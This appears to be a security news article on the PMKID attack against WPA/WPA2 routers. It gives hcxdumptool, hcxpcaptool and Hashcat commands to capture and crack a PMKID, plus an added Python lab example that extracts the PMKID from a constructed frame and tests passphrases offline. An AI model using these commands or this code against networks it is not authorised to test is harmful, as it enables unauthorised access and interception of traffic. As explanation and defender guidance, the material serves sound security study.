A new WiFi hacking method for WPA/WPA2

A specialist has found a new way to crack passwords on most modern routers

The cybersecurity and digital forensics expert Jens “Atom” Steube, known for having developed Hashcat, the popular password cracking tool, returns to the scene with a new WiFi hacking method that allows finding the password of most currently used routers.

According to digital forensics specialists from the International Institute of Cyber Security, this attack technique works against the wireless network protocols WPA/WPA2 when roaming functions based on the Pairwise Master Key Identifier (PMKID) are enabled. Steube discovered this attack variant while researching the WiFi WPA3 security protocol.

The technique allows attackers to retrieve Pre-Shared Keys (PSK) and use them to hack the targeted WiFi network, thus gaining access to the victim’s Internet traffic.

However, it differs from other WiFi hacking techniques: this attack does not require capturing a full four-way EAPOL (Extensible Authentication Protocol over LAN) authentication handshake. According to digital forensics specialists from the International Institute of Cyber Security, the attack works on the Robust Security Network Information Element (RSN IE) of a single EAPOL frame, which is requested from the access point.

“This attack variant was discovered incidentally while we were looking for ways to attack the new WPA3 security standard. On the other hand, hacking this new standard would be much more complex because of its modern key-setting protocol known as Simultaneous Authentication of Equals (SAE),” the expert mentioned.

According to Steube, the main difference between this new method and the rest of the known attacks is that it does not require capturing the complete EAPOL four-way handshake, because “it is done in the RSN IE element of a single EAPOL frame”.

The RSN protocol allows secure communications to be established over 802.11 wireless networks. It uses the PMKID, the identifier of the Pairwise Master Key shared between a client and an access point, when establishing the connection. According to the expert’s report, the attack is carried out as follows:

  • Run hcxdumptool to request the PMKID from the access point and save the received frame to a file (in pcapng format):

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

  • Run the hcxpcaptool tool to convert the captured data from pcapng format to a hash format accepted by Hashcat:

$ ./hcxpcaptool -z test.16800 test.pcapng

  • Start the Hashcat cracking tool (v4.2.0 or higher) and crack the hash. The hash mode to use is 16800:

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

This recovers the password of the victim’s WiFi network. Steube points out that he does not know exactly how many routers this attack works against, but he believes it could be effective against all WiFi 802.11 i/p/q/r networks with roaming capabilities enabled. “In other words, the attack would work against most modern routers,” adds Steube.
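Why a single frame is enough, shown as an added example that is not from the article, from Steube’s post, or from the hcxtools/Hashcat projects: the PMKID in the first EAPOL-Key message is carried as a key data encapsulation (KDE) under the RSN OUI 00-0f-ac, and it is derived only from the Pairwise Master Key and the two MAC addresses. The code constructs such a message for a lab access point, extracts the PMKID the way step 2 does, writes it in the Hashcat mode 16800 line format (PMKID*MAC_AP*MAC_STA*ESSID, hex encoded), and tests a candidate passphrase with the IEEE 802.11i derivation (PBKDF2-HMAC-SHA1 over the SSID, then HMAC-SHA1 with the label "PMK Name"). The SSID, MAC addresses and passphrase are constructed values, not from any real network.

```python
import hashlib
import hmac
import struct
from typing import Optional

RSN_OUI = b"\x00\x0f\xac"   # OUI used by RSN key data encapsulations (KDEs)
KDE_TYPE_PMKID = 4          # KDE data type that carries a PMKID


# IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)
def derive_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


# PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)
def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def build_eapol_m1(pmkid: bytes) -> bytes:
    """Constructed EAPOL-Key message 1 (RSN descriptor) whose Key Data field
    carries a PMKID KDE. Field order and sizes follow the EAPOL-Key frame format."""
    kde = b"\xdd" + bytes([3 + 1 + len(pmkid)]) + RSN_OUI + bytes([KDE_TYPE_PMKID]) + pmkid
    key_info = 0x008A  # pairwise key, ACK set, descriptor version 2
    body = (struct.pack(">BHH", 2, key_info, 16)        # descriptor type 2 = RSN, key length 16
            + struct.pack(">Q", 1)                      # replay counter
            + b"\x11" * 32                              # ANonce (constructed, fixed value)
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, key RSC, key ID
            + b"\x00" * 16                              # MIC is zero in message 1
            + struct.pack(">H", len(kde)) + kde)        # key data length, key data
    return struct.pack(">BBH", 2, 3, len(body)) + body  # 802.1X v2, packet type 3 = EAPOL-Key


def extract_pmkid(frame: bytes) -> Optional[bytes]:
    """Walk the Key Data field of an EAPOL-Key frame and return the PMKID if a
    PMKID KDE is present. The fixed header ends at byte 99; key data follows."""
    if len(frame) < 99 or frame[1] != 3 or frame[4] != 2:
        return None
    key_data_len = struct.unpack(">H", frame[97:99])[0]
    data = frame[99:99 + key_data_len]
    i = 0
    while i + 2 <= len(data):
        tag, ln = data[i], data[i + 1]
        body = data[i + 2:i + 2 + ln]
        if tag == 0xDD and len(body) == 20 and body[:3] == RSN_OUI and body[3] == KDE_TYPE_PMKID:
            return bytes(body[4:])
        i += 2 + ln
    return None


def to_hashcat_16800(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Hashcat mode 16800 line: PMKID*MAC_AP*MAC_STA*ESSID, all hex encoded."""
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def check_candidate(line: str, passphrase: str) -> bool:
    """Offline test of one candidate passphrase against a 16800 line. This is the
    per-candidate work of step 3, dominated by the 4096-round PBKDF2."""
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.split("*")
    pmk = derive_pmk(passphrase, bytes.fromhex(ssid_hex).decode())
    expected = derive_pmkid(pmk, bytes.fromhex(ap_hex), bytes.fromhex(sta_hex))
    return hmac.compare_digest(expected, bytes.fromhex(pmkid_hex))


def roundtrip(ssid: str, passphrase: str, ap_mac: bytes, sta_mac: bytes) -> str:
    """Simulate a lab AP: derive its PMKID, emit message 1, recover the PMKID from
    the frame and format it as a 16800 line. Returns that line."""
    frame = build_eapol_m1(derive_pmkid(derive_pmk(passphrase, ssid), ap_mac, sta_mac))
    recovered = extract_pmkid(frame)
    assert recovered is not None
    return to_hashcat_16800(recovered, ap_mac, sta_mac, ssid)


if __name__ == "__main__":
    # Constructed lab values; the MACs and SSID do not belong to any real network.
    line = roundtrip("LabNet", "correct horse", bytes.fromhex("020000000001"), bytes.fromhex("020000000002"))
    print(line)
    print("right passphrase:", check_candidate(line, "correct horse"))
    print("wrong passphrase:", check_candidate(line, "password"))
```

The defender’s takeaway is visible in `check_candidate`: nothing in the frame depends on a client secret, so once the PMKID is observed the only thing standing between the attacker and the PSK is the entropy of the passphrase, tested at 4096 PBKDF2 rounds per guess. A network owner can run `derive_pmkid` with their own SSID and PSK to confirm that a PMKID seen in their lab matches, and should treat a short or dictionary-derived PSK as already compromised on any network where the access point hands out PMKIDs.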